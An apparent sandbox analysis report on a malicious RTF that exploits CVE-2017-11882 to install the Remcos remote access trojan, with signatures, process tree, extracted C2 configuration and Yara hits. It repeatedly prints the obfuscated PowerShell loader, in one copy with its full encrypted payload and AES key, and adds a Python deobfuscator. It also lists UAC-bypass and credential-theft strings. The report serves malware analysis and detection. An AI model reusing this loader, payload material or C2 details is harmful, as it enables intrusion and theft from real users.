Windows Analysis Report
4vzwJTZbwT.rtf

Overview

General Information

Sample name: 4vzwJTZbwT.rtf (renamed because the original name is a hash value)
Original sample name: 7279ab0fbc0a02d8b6966ed3cdf67aca.rtf
Analysis ID: 1484115
MD5: 7279ab0fbc0a02d8b6966ed3cdf67aca
SHA1: 4a6bef6dba00cc872e10b66b00786ace03e6443a
SHA256: 04714ec4a9cfa0304d2de5012ae1081850d2a2b080ad68831ba2c8385bda4d01
Tags: rtf

Detection

Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32.EXE
Sigma detected: Remcos
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
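The PowerShell stage in the tree above is one script wrapped twice. Each layer is a single-quoted string broken up with '+' concatenation, followed by -replace / -creplace clauses whose operands are spelled as [Char] sums (e4j stands for the single quote, CnI for the double quote, TMI for $, AQM for the pipe), and the result is handed to Invoke-Expression through $VerbosePreference.ToString()[1,3]+'x', which spells "iex". The Python below is an added example written for this page, not code from the report or from the sample: it peels those layers statically, keeping PowerShell's distinction between the case-insensitive regex -replace and the case-sensitive -creplace, then pulls out the AES key string and ciphertext the decrypted script passes to Decrypt-AESEncryption and mirrors that function's key derivation (SHA-256 of the UTF-8 key) and IV convention (first 16 bytes of the decoded blob). The SAMPLE string is constructed and abridged from the command line above: wrapper and tokens are verbatim, the function body is shortened, and the base64 ciphertext is replaced by a placeholder. The AES-CBC decryption itself needs a crypto library and is not part of this example.

```python
"""Static peel of the layered PowerShell obfuscation in this report's process tree.

Each layer is a single-quoted string split by '+' concatenation, followed by
-replace / -creplace clauses whose operands are written as [Char]N sums, and
finally piped into Invoke-Expression. Peeling one layer reproduces what the
next PowerShell stage would execute, without running any of it.
"""
import base64
import hashlib
import re

# One operand of a -replace clause: 'literal', ([Char]N+[Char]M...) or a bare [Char]N.
_OPERAND = r"(?:'[^']*'|\(\s*\[char\]\d+(?:\s*\+\s*\[char\]\d+)*\s*\)|\[char\]\d+)"
_CLAUSE = re.compile(rf"-(c?)replace\s*({_OPERAND})\s*,\s*({_OPERAND})", re.I)
_CHAR = re.compile(r"\[char\](\d+)", re.I)


def resolve_operand(op: str) -> str:
    """'abc' -> abc; ([CHar]67+[CHar]110+[CHar]73) -> CnI; [Char]39 -> a single quote."""
    op = op.strip()
    if op.startswith("'"):
        return op[1:-1]
    return "".join(chr(int(n)) for n in _CHAR.findall(op))


def collapse_concat(text: str) -> str:
    """Join 'abc'+'def' fragments back into one literal ('+' may carry spaces)."""
    return re.sub(r"'\s*\+\s*'", "", text)


def peel_layer(text: str):
    """Return the script the next stage would run, or None if no layer is left."""
    text = collapse_concat(text)
    literal = re.search(r"'([^']*)'", text)  # first quoted string = wrapped payload
    if literal is None:
        return None
    body, tail = literal.group(1), text[literal.end():]
    clauses = _CLAUSE.findall(tail)           # the -replace clauses applied to it
    if not clauses:
        return None
    for sensitive, pat, rep in clauses:
        pat, rep = resolve_operand(pat), resolve_operand(rep)
        if sensitive:   # -creplace is case-sensitive
            body = body.replace(pat, rep)
        else:           # -replace is a case-insensitive regex; the pattern is escaped
            body = re.sub(re.escape(pat), lambda _m: rep, body, flags=re.I)
    return body


def deobfuscate(text: str, max_layers: int = 8) -> str:
    """Peel until nothing looks like a layer any more; returns the final script."""
    for _ in range(max_layers):
        nxt = peel_layer(text)
        if nxt is None:
            break
        text = nxt
    return text


def decode_iex_alias(preference: str = "SilentlyContinue") -> str:
    """&( $VerbosePreference.ToString()[1,3]+'x'-join'' ): characters 1 and 3 of the
    default preference value ('i', 'e') joined with 'x' give the alias 'iex'."""
    return preference[1] + preference[3] + "x"


def extract_aes_material(script: str):
    """Key string and base64 ciphertext as the peeled script assigns them
    ($chave and $textoCriptografadoBase64 are the sample's own variable names)."""
    key = re.search(r'\$chave\s*=\s*"([^"]*)"', script)
    blob = re.search(r'\$textoCriptografadoBase64\s*=\s*"([^"]*)"', script)
    return (key.group(1) if key else None, blob.group(1) if blob else None)


def derive_key(key_text: str) -> bytes:
    """Same derivation as Decrypt-AESEncryption: AES-256 key = SHA-256(UTF-8 key string)."""
    return hashlib.sha256(key_text.encode("utf-8")).digest()


def split_iv(blob_b64: str):
    """The script uses bytes 0..15 of the decoded blob as the CBC IV and decrypts the rest."""
    raw = base64.b64decode(blob_b64)
    return raw[:16], raw[16:]


# Constructed, abridged from the command line in the process tree: wrapper and
# tokens verbatim, function body shortened, ciphertext replaced by a placeholder.
SAMPLE = (
    "(('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)"
    "TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;"
    "TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy."
    "e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.IV = TMIcipherBytes[0..15];}"
    "TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;"
    "TMItextoCriptografadoBase64 = CnI<base64 omitted>CnI;"
    "Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)"
    "-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)"
    "AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 "
    "-CREplacE([Char]65+[Char]81+[Char]77),[Char]124)"
    "|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"
)

if __name__ == "__main__":
    final = deobfuscate(SAMPLE)
    print(final)
    print("invoked via:", decode_iex_alias(), "| AES material:", extract_aes_material(final))
```

Run against the full command line from the tree (paste it as the argument to deobfuscate), the first peel yields the script with the CnI/TMI tokens and the inner -replace clauses still present, and the second yields readable PowerShell: AES-256-CBC with zero padding, key = SHA256(key string), IV = first 16 bytes of the blob, plaintext trimmed of NULs and passed to Invoke-Expression. Peeling stops as soon as no quoted literal with trailing -replace clauses remains, so it does not try to interpret the decrypted script itself.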
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted Remcos configuration:
{"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "benchao", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9R4HLX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches: initial sample
  • Source: 4vzwJTZbwT.rtf; Rule: INDICATOR_RTF_MalVer_Objects; Author: ditekSHen; Description: detects RTF documents with a non-standard version that embed one of the objects mostly observed in exploit documents
    • 0xa64:$obj2: \objdata
    • 0xa4a:$obj3: \objupdate
    • 0xa25:$obj6: \objlink

Yara matches: dropped files
  • Source: C:\ProgramData\remcos\logs.dat; Rule: JoeSecurity_Remcos; Author: Joe Security; Description: Yara detected Remcos RAT
  • Source: C:\Users\user\Desktop\~WRD0000.tmp; Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2; Author: ditekSHen; Description: detects CVE-2017-8759 weaponized RTF documents
    • 0x969c:$clsid3: 4d73786d6c322e534158584d4c5265616465722e (ASCII: Msxml2.SAXXMLReader.)
    • 0x96e6:$ole2: d0cf11e0a1b11ae1 (OLE2 compound-file header signature)
    • 0x40ee:$obj2: \objdata
    • 0x40cc:$obj4: \objemb

Yara matches: memory dumps
  • Source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Author: Joe Security; Description: Yara detected Remcos RAT
  • Source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Author: Joe Security; Description: Yara detected Remcos RAT
  • Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Author: Joe Security; Description: Yara detected Remcos RAT
  • Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_UACBypassusingCMSTP; Author: Joe Security; Description: Yara detected UAC Bypass using CMSTP
  • Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: Windows_Trojan_Remcos_b296e965; Author: unknown; Description: unknown
    • 0x6c4a8:$a1: Remcos restarted by watchdog!
    • 0x6ca20:$a3: %02i:%02i:%02i:%03i
  (Table truncated; the full table in the report lists 19 entries.)

Yara matches: unpacked PEs
  • Source: 8.2.RegAsm.exe.400000.0.raw.unpack; Rule: JoeSecurity_Remcos; Author: Joe Security; Description: Yara detected Remcos RAT
  • Source: 8.2.RegAsm.exe.400000.0.raw.unpack; Rule: JoeSecurity_UACBypassusingCMSTP; Author: Joe Security; Description: Yara detected UAC Bypass using CMSTP
  • Source: 8.2.RegAsm.exe.400000.0.raw.unpack; Rule: Windows_Trojan_Remcos_b296e965; Author: unknown; Description: unknown
    • 0x6c4a8:$a1: Remcos restarted by watchdog!
    • 0x6ca20:$a3: %02i:%02i:%02i:%03i
  • Source: 8.2.RegAsm.exe.400000.0.raw.unpack; Rule: REMCOS_RAT_variants; Author: unknown; Description: unknown
    • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6656c:$str_b2: Executing file:
    • 0x675ec:$str_b3: GetDirectListeningPort
    • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x67118:$str_b7: \update.vbs
    • 0x66594:$str_b9: Downloaded file:
    • 0x66580:$str_b10: Downloading file:
    • 0x66624:$str_b12: Failed to upload file:
    • 0x675b4:$str_b13: StartForward
    • 0x675d4:$str_b14: StopForward
    • 0x67070:$str_b15: fso.DeleteFile "
    • 0x67004:$str_b16: On Error Resume Next
    • 0x670a0:$str_b17: fso.DeleteFolder "
    • 0x66614:$str_b18: Uploaded file:
    • 0x665d4:$str_b19: Unable to delete:
    • 0x67038:$str_b20: while fso.FileExists("
    • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
  • Source: 8.2.RegAsm.exe.400000.0.raw.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM; Author: ditekSHen; Description: detects Windows executables bypassing UAC using CMSTP COM interfaces (MITRE T1218.003)
    • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    • 0x6637c:$s1: CoGetObject
    • 0x66390:$s1: CoGetObject
    • 0x663ac:$s1: CoGetObject
    • 0x70338:$s1: CoGetObject
    • 0x6633c:$s2: Elevation:Administrator!new:
  (Table truncated; the full table in the report lists 18 entries.)

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 172.245.123.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 172.245.123.11, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: 